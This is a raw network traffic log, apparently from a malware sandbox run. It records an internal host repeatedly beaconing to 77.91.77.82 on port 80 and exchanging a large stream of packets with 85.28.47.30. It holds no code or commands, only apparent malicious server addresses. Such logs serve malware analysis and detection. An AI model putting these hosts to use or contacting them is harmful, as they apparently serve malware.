                                                                Jul 5, 2024 04:25:12.513976097 CEST804988877.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:13.205002069 CEST804988877.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:13.211350918 CEST4988880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:13.318991899 CEST4988880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:13.321585894 CEST4988980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:13.324125051 CEST804988877.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:13.324450016 CEST4988880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:13.326479912 CEST804988977.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:13.329595089 CEST4988980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:13.332566023 CEST4988980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:13.337462902 CEST804988977.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:14.024214029 CEST804988977.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:14.024259090 CEST4988980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:14.029546022 CEST4988980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:14.029958010 CEST4989080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:14.034699917 CEST804988977.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:14.034710884 CEST804989077.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:14.034740925 CEST4988980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:14.034796000 CEST4989080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:14.035090923 CEST4989080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:14.039783955 CEST804989077.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:14.733037949 CEST804989077.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:14.733095884 CEST4989080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:14.851344109 CEST4989080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:14.851345062 CEST4989180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:14.856277943 CEST804989177.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:14.856925011 CEST804989077.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:14.859473944 CEST4989080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:14.859476089 CEST4989180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:14.863358021 CEST4989180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:14.868181944 CEST804989177.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:15.586893082 CEST804989177.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:15.587105989 CEST4989180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:15.591362953 CEST4989280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:15.591377974 CEST4989180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:15.596185923 CEST804989277.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:15.596335888 CEST4989280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:15.596589088 CEST4989280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:15.597042084 CEST804989177.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:15.599632025 CEST4989180192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:15.601349115 CEST804989277.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:16.291727066 CEST804989277.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:16.291775942 CEST4989280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:16.399189949 CEST4989280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:16.399707079 CEST4989380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:16.404648066 CEST804989277.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:16.404692888 CEST4989280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:16.404704094 CEST804989377.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:16.404769897 CEST4989380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:16.404928923 CEST4989380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:16.410650015 CEST804989377.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:17.127269030 CEST804989377.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:17.127381086 CEST4989380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:17.130333900 CEST4989380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:17.130333900 CEST4989480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:17.135166883 CEST804989477.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:17.135426044 CEST804989377.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:17.138984919 CEST4989380192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:17.138984919 CEST4989480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:17.139179945 CEST4989480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:17.143943071 CEST804989477.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:17.858417988 CEST804989477.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:17.858474016 CEST4989480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:17.976459026 CEST4989480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:17.976948977 CEST4989580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:17.981501102 CEST804989477.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:17.981576920 CEST4989480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:17.981698990 CEST804989577.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:17.981762886 CEST4989580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:17.982007980 CEST4989580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:17.986974001 CEST804989577.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:18.683443069 CEST804989577.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:18.683500051 CEST4989580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:18.687129021 CEST4989580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:18.687449932 CEST4989680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:18.692442894 CEST804989577.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:18.692456961 CEST804989677.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:18.692492008 CEST4989580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:18.692531109 CEST4989680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:18.692823887 CEST4989680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:18.697990894 CEST804989677.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:19.419058084 CEST804989677.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:19.419461012 CEST4989680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:19.539366007 CEST4989680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:19.539400101 CEST4989780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:19.547492027 CEST804989777.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:19.547698021 CEST804989677.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:19.547723055 CEST4989780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:19.547791004 CEST4989680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:19.551367998 CEST4989780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:19.556143999 CEST804989777.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:20.242548943 CEST804989777.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:20.242611885 CEST4989780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:20.245928049 CEST4989780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:20.246296883 CEST4989880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:20.254343033 CEST804989877.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:20.254439116 CEST4989880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:20.254542112 CEST4989880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:20.254894972 CEST804989777.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:20.254981995 CEST4989780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:20.260243893 CEST804989877.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:20.982157946 CEST804989877.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:20.987343073 CEST4989880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:21.100577116 CEST4989880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:21.100577116 CEST4989980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:21.105518103 CEST804989977.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:21.105839968 CEST4989980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:21.106017113 CEST804989877.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:21.106049061 CEST4989980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:21.106250048 CEST4989880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:21.110949993 CEST804989977.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:21.810556889 CEST804989977.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:21.813833952 CEST4989980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:21.813833952 CEST4989980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:21.815351963 CEST4990080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:21.819091082 CEST804989977.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:21.820149899 CEST804990077.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:21.820178986 CEST4989980192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:21.821635962 CEST4990080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:21.821635962 CEST4990080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:21.827006102 CEST804990077.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:22.521778107 CEST804990077.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:22.521853924 CEST4990080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:22.526987076 CEST4990180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:25:22.531814098 CEST804990177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:25:22.531871080 CEST4990180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:25:22.532244921 CEST4990180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:25:22.537213087 CEST804990177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:25:23.239654064 CEST804990177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:25:23.239837885 CEST4990180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:25:24.040483952 CEST4990080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:24.040973902 CEST4990280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:24.045808077 CEST804990277.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:24.045866966 CEST4990280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:24.046880960 CEST4990280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:24.047702074 CEST804990077.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:24.047755003 CEST4990080192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:24.048374891 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:24.051629066 CEST804990277.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:24.053170919 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:24.053234100 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:24.053509951 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:24.058372021 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:24.739543915 CEST804990277.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:24.739598989 CEST4990280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:24.851371050 CEST4990280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:24.851377964 CEST4990480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:24.856234074 CEST804990477.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:24.856396914 CEST4990480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:24.856457949 CEST804990277.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:24.856583118 CEST4990280192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:24.856678009 CEST4990480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:24.861440897 CEST804990477.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:24.894685984 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:24.894877911 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:24.899364948 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:24.904572010 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:25.086622953 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:25.086641073 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:25.088959932 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:25.088960886 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:25.094758034 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:25.277350903 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:25.277363062 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:25.277374983 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:25.277384043 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:25.277396917 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:25.277406931 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:25.277546883 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:25.277546883 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:25.279367924 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:25.285408020 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:25.463274002 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:25.463354111 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:25.584995031 CEST804990477.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:25.587675095 CEST4990480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:25.639406919 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:25.639406919 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:25.644351006 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:25.644411087 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:25.644421101 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:25.644464970 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:25.644474030 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:25.644490957 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:25.644507885 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:25.739372969 CEST4990580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:25.739378929 CEST4990480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:25.744296074 CEST804990577.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:25.744525909 CEST4990580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:25.744556904 CEST804990477.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:25.747534037 CEST4990480192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:25.753015041 CEST4990580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:25.757791042 CEST804990577.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:26.356448889 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:26.356502056 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:26.476063013 CEST804990577.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:26.476110935 CEST4990580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:26.585779905 CEST4990580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:26.586066008 CEST4990680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:26.590815067 CEST804990677.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:26.590871096 CEST4990680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:26.590934992 CEST804990577.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:26.590976954 CEST4990580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:26.591183901 CEST4990680192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:25:26.595938921 CEST804990677.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:25:26.639597893 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:26.644407034 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:26.823987007 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:26.823999882 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:26.824021101 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:26.824033022 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:26.824043036 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:26.824047089 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:26.824079990 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:26.824274063 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:26.824310064 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:26.824316025 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:26.824335098 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:26.824347019 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:26.824352026 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:26.824357986 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:26.824372053 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:26.824379921 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:26.824398041 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:26.825081110 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:26.825092077 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:26.825102091 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:26.825134039 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:26.825134039 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:26.825145006 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:26.906419992 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:26.906430960 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:26.906445980 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:26.906517029 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:26.906517029 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:26.906528950 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:26.906539917 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:26.906548977 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:26.906618118 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:26.917608976 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:26.917619944 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:26.917629004 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:26.917689085 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:26.917700052 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:26.917721033 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:26.917745113 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:26.917756081 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:26.917764902 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:26.917776108 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:26.917838097 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:26.917838097 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:26.918001890 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:26.918692112 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:26.918701887 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:26.918711901 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:26.918761969 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:26.918761969 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:26.918804884 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:26.918816090 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:26.918860912 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:26.918963909 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:26.919620037 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:26.919630051 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:26.919640064 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:26.919650078 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:26.919715881 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:26.988900900 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:26.988940954 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:26.988953114 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:26.989003897 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:26.989015102 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:26.989025116 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:26.989029884 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:26.989288092 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:26.989392042 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:26.999903917 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:26.999916077 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:26.999927044 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:26.999998093 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.000041962 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.000055075 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.000072956 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.000077963 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.000077963 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.000086069 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.000109911 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.000219107 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.000732899 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.000745058 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.000756025 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.000811100 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.000811100 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.001071930 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.001084089 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.001095057 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.001279116 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.011228085 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.011256933 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.011272907 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.011282921 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.011327982 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.011338949 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.011349916 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.011359930 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.011440039 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.011497974 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.011507988 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.011518002 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.011573076 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.011573076 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.011823893 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.011836052 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.011847019 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.011874914 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.011902094 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.011902094 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.011924982 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.011928082 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.011940956 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.012691975 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.012702942 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.012713909 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.012774944 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.012774944 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.012798071 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.012809038 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.012818098 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.012954950 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.013603926 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.013613939 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.013623953 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.013685942 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.013686895 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.013686895 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.013699055 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.013710976 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.013878107 CEST4990380192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:25:27.014486074 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.014494896 CEST804990385.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:25:27.014506102 CEST804990385.28.47.30192.168.2.4
